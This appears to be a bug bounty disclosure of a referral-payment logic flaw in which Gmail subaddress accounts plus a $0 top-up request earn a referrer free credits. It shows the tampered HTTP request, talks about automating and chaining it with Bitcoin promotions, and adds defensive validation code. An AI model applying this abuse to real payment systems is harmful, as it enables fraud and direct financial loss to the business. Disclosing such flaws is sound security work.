Referral System Abuse Leading to Unlimited Funds [EN]

Introduction

In July 2025, I discovered a business logic flaw in the referral and payment system that allowed attackers to generate unlimited free funds without making real purchases.

The flaw combined Gmail subaddressing tricks with a broken $0 payment validation, resulting in unauthorized funds being applied to referrer accounts.
This issue could be escalated further during promotional campaigns, which offered $5 in Bitcoin per item purchase.

Proof of Concept

The attack relied on two weaknesses:

1. Account Duplication via Gmail Subaddressing
   For example: attacker+1@gmail.com, attacker+2@gmail.com, etc.
   These were treated as unique accounts, even though all emails were delivered to the same inbox.

2. Invalid $0 Payments Accepted as Valid Transactions
   The system incorrectly processed $0 transactions as successful.

Steps to Reproduce

1. Copy the referral code from the main account:

https://example.com/abcd1234

2. Register fake “friend” accounts using the referral code:

attacker+1@gmail.com
attacker+2@gmail.com
attacker+3@gmail.com

3. Trigger the $0 payment bug by changing the amount to 0 while topping up the main account.

Original request:

POST /api/control_panel/account_balance/custom_pay HTTP/2
Host: www.example.com
Content-Type: application/json
Cookie: 

{
  "amount": 500
}

Modified request (amount set to 0):

POST /api/control_panel/account_balance/custom_pay HTTP/2
Host: www.example.com
Content-Type: application/json
Cookie: 

{
  "amount": 0
}

Response:

HTTP/2 200 OK

{
  "success": true
}

A receipt email was generated, and the referrer account received $2 in funds.

4. Repeat the process:
This could be automated at scale to generate unlimited funds (only $2 per fake account, but the loop can be repeated indefinitely).

5. Escalation:
During promotions, the attacker could chain this flaw with the $5 Bitcoin reward per item purchase, effectively farming BTC rewards.
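The two weaknesses above (subaddress aliases counted as distinct accounts, and a $0 top-up credited as a successful payment) can both be closed server-side. The following is an added defensive example, not the vendor's code; the provider list, the $1 minimum and the function names are assumptions.

```python
from decimal import Decimal, InvalidOperation

# Providers known to deliver user+tag@domain to user@domain (assumed list; extend as needed).
SUBADDRESS_DOMAINS = {"gmail.com", "googlemail.com"}
MIN_TOPUP = Decimal("1.00")          # assumed minimum chargeable amount
REFERRAL_REWARD = Decimal("2.00")    # the $2 per referral described in the writeup


def canonicalize_email(email: str) -> str:
    """Collapse subaddress variants so attacker+1@gmail.com and attacker+2@gmail.com compare equal."""
    local, _, domain = email.strip().lower().rpartition("@")
    if not local or not domain:
        raise ValueError("malformed email address")
    if domain in SUBADDRESS_DOMAINS:
        # Gmail ignores everything after '+' and all dots in the local part.
        local = local.split("+", 1)[0].replace(".", "")
    return f"{local}@{domain}"


def referral_is_eligible(referrer_email: str, new_email: str, seen: set) -> bool:
    """A referral may pay out only if the new account is not an alias of the referrer or of a known account."""
    canon = canonicalize_email(new_email)
    if canon == canonicalize_email(referrer_email) or canon in seen:
        return False
    seen.add(canon)
    return True


def validate_topup(body: dict) -> Decimal:
    """Reject the $0, negative and non-numeric amounts that the vulnerable endpoint accepted."""
    try:
        amount = Decimal(str(body.get("amount")))
    except (InvalidOperation, TypeError):
        raise ValueError("amount must be numeric")
    if amount < MIN_TOPUP:
        raise ValueError(f"amount must be at least {MIN_TOPUP}")
    return amount


def topup_accepted(body: dict) -> bool:
    """Convenience wrapper: True only when validate_topup() accepts the request body."""
    try:
        validate_topup(body)
        return True
    except ValueError:
        return False


def referral_credit(payment_captured: bool, amount: Decimal) -> Decimal:
    """Release the reward only after the processor confirms capture of a non-zero amount."""
    if not payment_captured or amount < MIN_TOPUP:
        return Decimal("0")
    return REFERRAL_REWARD
```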


Severity

Initially classified as High, but later downgraded to Medium based on the assessed impact on the system. Not sure why, but I don't mind.

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Security Impact

  • Unlimited free credits/funds.
  • Direct financial loss when combined with promotional rewards.

Timeline

  • July 16, 2025 – Report submitted
  • July 27, 2025 – Pending program review
  • August 8, 2025 – Bug confirmed in scope
  • August 20, 2025 – Severity downgraded from High to Medium
  • August 20, 2025 – Issue resolved
Last updated: 31-08-2025